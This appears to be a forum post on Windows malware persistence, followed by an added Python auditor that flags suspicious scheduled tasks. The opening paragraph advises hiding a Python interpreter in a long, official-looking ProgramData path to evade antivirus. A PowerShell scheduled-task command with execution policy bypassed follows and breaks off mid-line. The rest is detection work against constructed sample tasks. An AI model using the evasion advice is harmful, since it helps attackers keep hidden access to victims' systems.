Re persistence, I've never liked the "super stealthy" methods I see out there. Every once in a while there's a really nice one that actually does bypass things, but then it gets attention and is mitigated, or gets overwritten when you infect that obscure DLL and the user updates the file. In my experience, KEEP IT SIMPLE. I like Python. It's not an executable file; you can put a static Python executable on a machine and absolutely no AV is going to pick it up (hell, you can throw whole folders on there if you don't want to use a static .exe). Name it like C:\ProgramData\Win32runtime\dlls\annoyingly\long\official\seeming\path\<ALL THE PYTHONS>. Most "real" reverse engineers and malware writers scoff at this, but hell, I've been using this for a decade and it just works.
C:/> powershell.exe -c
"$taskTrigger = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Friday -At 3am;
$taskAction = New-ScheduledTaskAction -Execute "PowerShell" -Argument "-NoProfile -ExecutionPolicy Bypass -File 'C:\scripts\ADHealth.ps1' -W
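From the defender's side, the scheduled-task-plus-interpreter pattern described in the post is exactly what a task audit should score. The following Python is an added example, not code from the original post: it walks a constructed list of task actions (the `Execute` and `Arguments` fields that `Get-ScheduledTask` and Security event 4698 expose) and flags interpreters launched from user-writable locations, a bypassed PowerShell execution policy, unusually deep "official-looking" executable paths, and a missing Author. The `TaskRecord` fields, the sample records, and the scoring weights are assumptions for illustration.

```python
"""Audit scheduled-task actions for interpreter-based persistence indicators.

Added example (not from the original post). The sample records are constructed;
real input would be exported from Get-ScheduledTask actions or Security event 4698,
both of which carry the Execute / Arguments / Author fields scored here.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath
import re


@dataclass
class TaskRecord:
    name: str         # task path, e.g. \Microsoft\Windows\Defrag\ScheduledDefrag
    execute: str      # action "Execute" value (program to run)
    arguments: str    # action "Arguments" value
    author: str = ""  # task "Author" field; often empty on hand-registered tasks


# Script interpreters commonly used as launchers (lowercase, no extension).
INTERPRETERS = {"python", "pythonw", "powershell", "pwsh", "wscript", "cscript", "mshta"}

# Locations a standard user can write to; binaries launched from here deserve scrutiny.
USER_WRITABLE_ROOTS = (r"c:\programdata", r"c:\users", r"c:\temp", r"c:\windows\temp")

# -ExecutionPolicy (or any abbreviation such as -ex / -ep) set to Bypass or Unrestricted.
WEAK_POLICY_RE = re.compile(r"-e[xp]\w*\s+(?:bypass|unrestricted)", re.IGNORECASE)

# Deeper than this many path components is unusual for a legitimately installed program.
MAX_SANE_DEPTH = 6
THRESHOLD = 2  # minimum score before a task is reported

# Constructed sample records (assumed data, not from any real host).
SAMPLE_TASKS = [
    TaskRecord(r"\Microsoft\Windows\Defrag\ScheduledDefrag",
               r"%windir%\system32\defrag.exe", "-c -h -o -$ -i", "Microsoft Corporation"),
    TaskRecord(r"\ADHealth", "PowerShell",
               r"-NoProfile -ExecutionPolicy Bypass -File 'C:\scripts\ADHealth.ps1'",
               r"CONTOSO\admin"),
    TaskRecord(r"\Win32runtime",
               r"C:\ProgramData\Win32runtime\dlls\annoyingly\long\official\seeming\path\python.exe",
               r"C:\ProgramData\Win32runtime\dlls\annoyingly\long\official\seeming\path\agent.py"),
    TaskRecord(r"\Backup\Nightly", r"C:\Program Files\Python311\python.exe",
               r'"C:\Program Files\BackupTool\run.py"', r"CONTOSO\backup-svc"),
]


def _clean(path: str) -> str:
    return path.strip("\"' ")


def _program_name(execute: str) -> str:
    """'C:\\...\\python.exe' or 'PowerShell' -> 'python' / 'powershell'."""
    return PureWindowsPath(_clean(execute)).stem.lower()


def _script_paths(arguments: str) -> list[str]:
    """Pull quoted paths and bare drive-letter paths out of an argument string."""
    pattern = r"""(?:"([^"]+)"|'([^']+)'|([A-Za-z]:\\[^\s"']+))"""
    return [a or b or c for a, b, c in re.findall(pattern, arguments)]


def _under_user_writable(path: str) -> bool:
    return _clean(path).lower().startswith(USER_WRITABLE_ROOTS)


def score_task(task: TaskRecord) -> tuple[int, list[str]]:
    """Return (score, reasons) for one task action; higher means more suspicious."""
    score, reasons = 0, []
    prog = _program_name(task.execute)
    if prog in INTERPRETERS:
        score += 1
        reasons.append(f"launches script interpreter {prog}")
    for candidate in [task.execute, *_script_paths(task.arguments)]:
        if _under_user_writable(candidate):
            score += 2
            reasons.append(f"path under user-writable location: {_clean(candidate)}")
            break
    if WEAK_POLICY_RE.search(task.arguments):
        score += 2
        reasons.append("weakens PowerShell execution policy")
    depth = len(PureWindowsPath(_clean(task.execute)).parts)
    if depth > MAX_SANE_DEPTH:
        score += 1
        reasons.append(f"unusually deep executable path ({depth} components)")
    if not task.author.strip():
        score += 1
        reasons.append("no Author recorded")
    return score, reasons


def audit(tasks: list[TaskRecord]) -> dict[str, tuple[int, list[str]]]:
    """Map task name -> (score, reasons) for every task at or above THRESHOLD."""
    flagged = {}
    for task in tasks:
        score, reasons = score_task(task)
        if score >= THRESHOLD:
            flagged[task.name] = (score, reasons)
    return flagged


if __name__ == "__main__":
    for name, (score, reasons) in audit(SAMPLE_TASKS).items():
        print(f"{name}  score={score}")
        for reason in reasons:
            print(f"    - {reason}")
```

Run against the constructed sample, the defrag task scores 0 and the backup job scores 1 (an interpreter, but installed under Program Files with a recorded author), so neither is reported; the `ADHealth` task is reported for the bypassed execution policy and the `Win32runtime` task for the interpreter under `C:\ProgramData`, the deep path and the blank Author. The weights are deliberately simple; a real deployment would feed the same fields from a task export or 4698 events and tune the threshold against the environment's baseline.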